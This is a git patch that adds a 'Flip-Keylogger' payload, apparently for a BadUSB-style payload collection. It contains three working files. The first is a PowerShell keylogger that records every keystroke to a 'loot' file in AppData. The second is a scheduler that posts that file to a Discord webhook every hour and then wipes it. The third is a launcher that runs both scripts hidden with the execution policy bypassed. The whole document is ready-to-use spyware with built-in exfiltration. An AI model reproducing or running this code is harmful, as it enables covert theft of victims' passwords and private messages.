From b2880e8a713dd40edb952918c894d7c880983ed3 Mon Sep 17 00:00:00 2001
From: I-Am-Jakoby <Michaelryanchitwood@gmail.com>
Date: Fri, 23 Dec 2022 12:14:01 -0600
Subject: [PATCH] Add files via upload

---
 Payloads/Flip-Keylogger/-keys.ps1 | 62 ++++++++++++++++++++++
 Payloads/Flip-Keylogger/-logs.ps1 | 88 +++++++++++++++++++++++++++++++
 Payloads/Flip-Keylogger/-p.cmd    | 10 ++++
 3 files changed, 160 insertions(+)
 create mode 100644 Payloads/Flip-Keylogger/-keys.ps1
 create mode 100644 Payloads/Flip-Keylogger/-logs.ps1
 create mode 100644 Payloads/Flip-Keylogger/-p.cmd

diff --git a/Payloads/Flip-Keylogger/-keys.ps1 b/Payloads/Flip-Keylogger/-keys.ps1
new file mode 100644
index 0000000..282a2cf
--- /dev/null
+++ b/Payloads/Flip-Keylogger/-keys.ps1
@@ -0,0 +1,62 @@
+function XXXlog($Path="$env:appdata\-locker\$env:UserName-loot.txt"){
+  $signatures = @'
+  [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 
+  public static extern short GetAsyncKeyState(int virtualKeyCode); 
+  [DllImport("user32.dll", CharSet=CharSet.Auto)]
+  public static extern int GetKeyboardState(byte[] keystate);
+  [DllImport("user32.dll", CharSet=CharSet.Auto)]
+  public static extern int MapVirtualKey(uint uCode, int uMapType);
+  [DllImport("user32.dll", CharSet=CharSet.Auto)]
+  public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
+'@
+
+  $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
+    
+
+  $null = New-Item -Path $Path -ItemType File -Force
+
+  try
+  {
+    Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red
+
+    while ($true) {
+      Start-Sleep -Milliseconds 40
+      
+
+      for ($ascii = 9; $ascii -le 254; $ascii++) {
+
+        $state = $API::GetAsyncKeyState($ascii)
+
+
+        if ($state -eq -32767) {
+          $null = [console]::CapsLock
+
+
+          $virtualKey = $API::MapVirtualKey($ascii, 3)
+
+
+          $kbstate = New-Object Byte[] 256
+          $checkkbstate = $API::GetKeyboardState($kbstate)
+
+
+          $mychar = New-Object -TypeName System.Text.StringBuilder
+
+          $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
+
+          if ($success) 
+          {
+
+            [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) 
+          }
+        }
+      }
+    }
+  }
+  finally
+  {
+
+    #notepad $Path
+  }
+}
+
+XXXlog
diff --git a/Payloads/Flip-Keylogger/-logs.ps1 b/Payloads/Flip-Keylogger/-logs.ps1
new file mode 100644
index 0000000..55a7a0a
--- /dev/null
+++ b/Payloads/Flip-Keylogger/-logs.ps1
@@ -0,0 +1,88 @@
+# powershell log scheduler
+# created by  : C0SM0
+# Modified by : Jakoby
+
+$Path="$env:appdata\-locker\$env:UserName-loot.txt"
+
+function Upload-Discord {
+
+[CmdletBinding()]
+param (
+    [parameter(Position=0,Mandatory=$False)]
+    [string]$file,
+    [parameter(Position=1,Mandatory=$False)]
+    [string]$text 
+)
+
+$hookurl = "$dc"
+
+$Body = @{
+  'username' = $env:username
+  'content' = $text
+}
+
+if (-not ([string]::IsNullOrEmpty($text))){
+Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl  -Method Post -Body ($Body | ConvertTo-Json)};
+
+if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
+}
+
+if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file "$env:tmp/$ZIP"}
+
+
+
+# times logs will be sent [keep in military time]
+$logTimes = @(
+    '00:00:00',
+    '01:00:00',
+    '02:00:00',
+    '03:00:00',
+    '04:00:00',
+    '05:00:00',
+    '06:00:00',
+    '07:00:00',
+    '08:00:00',
+    '09:00:00',
+    '10:00:00',
+    '11:00:00',
+    '12:00:00',
+    '13:00:00',
+    '14:00:00',
+    '15:00:00',
+    '16:00:00',
+    '17:00:00',
+    '18:00:00',
+    '19:00:00',
+    '20:00:00',
+    '21:00:00',
+    '22:00:00',
+    '23:00:00'
+)
+
+# sort the times in chronological order
+$logTimes = $logTimes | Sort-Object
+
+# ensure keylogger runs every day
+while ($true) {
+
+    # run keylogger for each trigger time
+    foreach ($t in $logTimes)
+    {
+        # checks if time passed already
+        if((Get-Date) -lt (Get-Date -Date $t))
+        {
+            # sleeps until next time is reached
+            while ((Get-Date -Date $t) -gt (Get-Date))
+            {
+              # sleeps
+              (Get-Date -Date $t) - (Get-Date) | Start-Sleep
+            }
+  
+            # runs keylogger
+			Upload-Discord -file $Path
+            echo "" > $Path 
+            #powershell Start-Process powershell.exe -windowstyle hidden -ep bypass "$env:appdata/keys.ps1"
+			
+        }
+    }
+}
\ No newline at end of file
diff --git a/Payloads/Flip-Keylogger/-p.cmd b/Payloads/Flip-Keylogger/-p.cmd
new file mode 100644
index 0000000..1594907
--- /dev/null
+++ b/Payloads/Flip-Keylogger/-p.cmd
@@ -0,0 +1,10 @@
+@echo off
+powershell Start-Process powershell.exe -windowstyle hidden -ep bypass "$env:appdata/-locker/keys.ps1"
+powershell Start-Process powershell.exe -windowstyle hidden -ep bypass "$env:appdata/-locker/logs.ps1"
+
+
+
+
+
+
+